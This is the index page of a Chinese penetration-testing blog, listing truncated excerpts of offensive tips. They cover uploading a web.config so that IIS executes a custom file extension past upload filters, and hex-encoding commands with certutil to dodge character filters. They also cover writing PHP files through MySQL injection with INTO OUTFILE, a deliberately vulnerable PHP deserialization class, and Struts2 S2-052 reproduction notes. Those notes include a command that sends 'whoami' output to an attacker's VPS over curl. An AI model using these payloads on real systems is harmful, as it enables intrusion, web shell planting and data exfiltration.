web.config中使asdx解析

时间:2018-6-13   作者:webbaozi   分类: 小技巧   热度:65°    
时间:2018-6-13   分类: 小技巧    热度:65  
在渗透测试中有时会遇见可以上传任意文件,但是过滤了asp,aspx等后缀。这里使用上传web.config文件来控制解析后缀,代码如下:<?xml version="1.0" encoding="utf-8"?> <configuration> <system.webServer> <directoryBrowse enabled="true" /> <handlers> <add name="asdx" path="*.asdx" verb="GET,H...

阅读全文>>

命令小技巧

时间:2018-5-19   作者:webbaozi   分类: 小技巧   热度:170°    
时间:2018-5-19   分类: 小技巧    热度:170  
十六进制转字符 利用场景:命令不能出现特殊字符 windows: echo 48 65 6C 6C 6F 2C 57 6F 72 6C 64 21 >hex.txt 生成 hex.txt,机器码对应的内容是 Hallo World! certutil -decodehex hex.txt bin.txt linux: echo -e "\x61">1.txt

阅读全文>>

热门 .net突破限制执行命令

时间:2017-12-28   作者:webbaozi   分类: 小技巧   热度:1152°    
时间:2017-12-28   分类: 小技巧    热度:1152  
遇见过一次可以使用 受影响的版本为: Microsoft .NET Framework 2.0  Microsoft .NET Framework 3.5 Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4 Microsoft .NET Framework 4.5 Microsoft .NET Framework 4.5.1 利用条件: 1.需要支持aspx并且高于Microsoft .NET Framework 1.14版本 2....

阅读全文>>

热门 通过mysql注入写文件

时间:2017-10-30   作者:webbaozi   分类: 小技巧   热度:1182°    
时间:2017-10-30   分类: 小技巧    热度:1182  
1. select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php'   2. select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E-- 此写法需要查询出数据,才能...

阅读全文>>

热门 php反序列小记

时间:2017-10-21   作者:webbaozi   分类: 小技巧   热度:966°    
时间:2017-10-21   分类: 小技巧    热度:966  
存在反序列漏洞的php代码 <html> <head> <title>WEB</title> </head> <body> <?php class Readflag{ var $file; function __destruct(){ if(isset($this->file)){ echo file_get_contents($this->file); } } function __wakeup(){ if($this->fi...

阅读全文>>

热门 struts2-02-052复现笔记

时间:2017-9-6   作者:webbaozi   分类: 小技巧   热度:875°    
时间:2017-9-6   分类: 小技巧    热度:875  
网上已经有很多复现过程了,这里就做个笔记 vps上执行: python -m SimpleHTTPServer 8080 然后执行命令powershell "curl http://ip:port/index.php?whoami=$(whoami)" powershell支持curl(测试机win7powershell不支持curl,未测) POST /struts2-rest-showcase/orders/4 HTTP/1.1 Host: 192.168.1.212 User-Agen...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1